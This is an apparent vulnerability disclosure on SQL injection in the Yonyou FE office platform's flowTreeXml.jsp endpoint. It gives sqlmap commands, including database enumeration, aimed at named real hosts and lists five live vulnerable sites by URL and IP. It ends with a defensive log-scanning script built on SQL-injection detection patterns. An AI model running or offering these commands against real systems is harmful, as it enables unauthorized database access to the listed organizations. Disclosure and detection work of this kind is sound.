### Brief description:

Generic SQL injection in the Yonyou (用友) FE office platform

### Details:

The following URL is vulnerable to SQL injection:

/permissionsreport/flowTreeXml.jsp?treeSearchKey=1

```
sqlmap -u "http://oa.hzuf.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1"
```

![1.jpg](https://images.seebug.org/upload/201408/27112023517614365722160a22ef26e7a8ecd45a.jpg)

```
sqlmap -u "http://oa.hzuf.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1" --dbs
```

![2.jpg](https://images.seebug.org/upload/201408/272033328e22b92471889e0306c25a3447a243d8.jpg)

5 cases:

- http://oa.hzuf.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1
- http://oa.shunhengli.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1
- http://oa.chnjcdc.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1
- http://115.29.234.197:8090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1
- http://119.145.194.122:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1

### Proof of vulnerability:

![2.jpg](https://images.seebug.org/upload/201408/272033328e22b92471889e0306c25a3447a243d8.jpg)
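A defender-side check for the endpoint described above, as an added example that is not part of the original report: it scans web access logs for requests to `/permissionsreport/flowTreeXml.jsp` whose `treeSearchKey` value carries SQL syntax or that come from a sqlmap user agent. The combined log format, the heuristics and the sample lines are assumptions constructed for illustration; only the path and parameter name come from the report.

```python
import re
from urllib.parse import urlsplit, parse_qs

ENDPOINT = "/permissionsreport/flowTreeXml.jsp"  # path named in the report
PARAM = "treeSearchKey"                          # parameter named in the report

# Assumed log layout: Apache/Tomcat "combined" access log format.
LINE_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
                     r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

# Heuristic: quoting, comments and SQL keywords a tree search key should not need.
SUSPICIOUS = re.compile(
    r"""['";]|--|/\*|\b(?:union|select|waitfor|sleep|benchmark)\b"""
    r"""|\b(?:and|or)\s+\d+\s*=\s*\d+""", re.IGNORECASE)

def flag_line(line):
    """Return (client_ip, values, reasons) for a suspicious request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if url.path.lower() != ENDPOINT.lower():  # tolerate case-insensitive servers
        return None
    # parse_qs percent-decodes, so encoded quotes and spaces are inspected too.
    values = parse_qs(url.query, keep_blank_values=True).get(PARAM, [])
    reasons = []
    if any(SUSPICIOUS.search(v) for v in values):
        reasons.append("sql-syntax-in-param")
    if m["ua"].lower().startswith("sqlmap"):  # sqlmap's default User-Agent prefix
        reasons.append("sqlmap-user-agent")
    return (m["ip"], values, reasons) if reasons else None

def scan(lines):
    """Collect every flagged request from an iterable of log lines."""
    return [hit for hit in map(flag_line, lines) if hit]

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Aug/2014:11:20:01 +0800] "GET /permissionsreport/flowTreeXml.jsp?treeSearchKey=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [27/Aug/2014:11:20:05 +0800] "GET /permissionsreport/flowTreeXml.jsp?treeSearchKey=1%27%20AND%201%3D1--%20 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [27/Aug/2014:11:20:06 +0800] "GET /permissionsreport/flowTreeXml.jsp?treeSearchKey=1 HTTP/1.1" 200 512 "-" "sqlmap/1.0 (http://sqlmap.org)"',
    '192.0.2.10 - - [27/Aug/2014:11:21:00 +0800] "GET /index.jsp?q=1%27 HTTP/1.1" 200 90 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, values, reasons in scan(SAMPLE_LOG):
        print(ip, values, ",".join(reasons))
```

The user-agent rule only catches unmodified tooling, so the parameter-content rule is the one to rely on when reviewing historical logs for this endpoint.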